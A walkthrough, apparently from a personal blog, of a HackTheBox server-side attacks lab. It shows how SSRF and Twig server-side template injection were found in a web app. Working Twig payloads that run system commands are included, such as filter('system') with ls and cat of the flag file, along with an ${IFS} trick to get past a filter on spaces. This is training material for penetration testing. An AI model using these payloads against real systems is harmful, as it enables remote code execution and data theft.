HackTheBox - Server-side Attacks - Skills Assessment Walkthrough


Scenario
You are tasked to perform a security assessment of a client's web application. Apply what you have learned in this module to obtain the flag.
Walkthrough
Accessing the target URL redirects us to the next page:
After browsing the site for a bit, enable Burp's proxy intercept to monitor the HTTP requests.
When the main page loads, we can observe several POST requests being made:
These requests include an api
parameter that contains a URL as its value.
The URL includes an address and a parameter named id
with a value (%3D
represents =
). This value appears to be processed by the server, which returns a JSON response containing the id
and a corresponding location.
The results are displayed directly on the main page of the web application:
We can test different values to confirm the presence of an SSRF vulnerability, for example localhost with port 80:
However, we can continue using the current URL and focus on the id
parameter, which is particularly interesting as it reflects it’s value back to us:
Since the id
parameter reflects it’s value back to us, it raises the possibility of another vulnerability - SSTI (Server-Side Template Injection). To test for this, we’ll try injecting a set of SSTI payloads (using resources like PayloadsAllTheThings) into the id
parameter and observe the response for any signs of template injection behavior.
And we successfully triggered one:
This confirms an SSTI vulnerability, specifically triggered by {{3*3}}
. This behavior suggests the template engine might be Twig or Jinja (since {{3*'3'}}
also returned 9).
Let's test for Jinja template injection:
No results were returned.
Let’s try testing for Twig template injection next:
We successfully exploited the SSTI vulnerability and revealed the source code of index.php
.
Next, we need Twig-specific payloads to execute commands on the server and retrieve the flag.
We will use the following payload:
{{['<COMMAND>']|filter('system')}}
First, list all files in the root directory using this payload:
{{['ls+/']|filter('system')}}
The error disappears when using ls
alone, suggesting the issue might be related to the /
directory. We also tried %20
(space), but the error persisted.
To bypass the space restriction, we can use the ${IFS}
variable as a substitute for the space character.
The ${IFS}
variable represents a space by default in Linux. We can use ${IFS}
to bypass the space restriction and insert spaces in our commands.
{{['ls${IFS}/']|filter('system')}}
We can see it worked, successfully returning all directories and files in the root directory.
Now, we can see the flag.txt
file, let’s view its contents:
{{['cat${IFS}/flag.txt']|filter('system')}}
And we got the flag 😉
Subscribe to my newsletter
Read articles from Ido Abramov directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
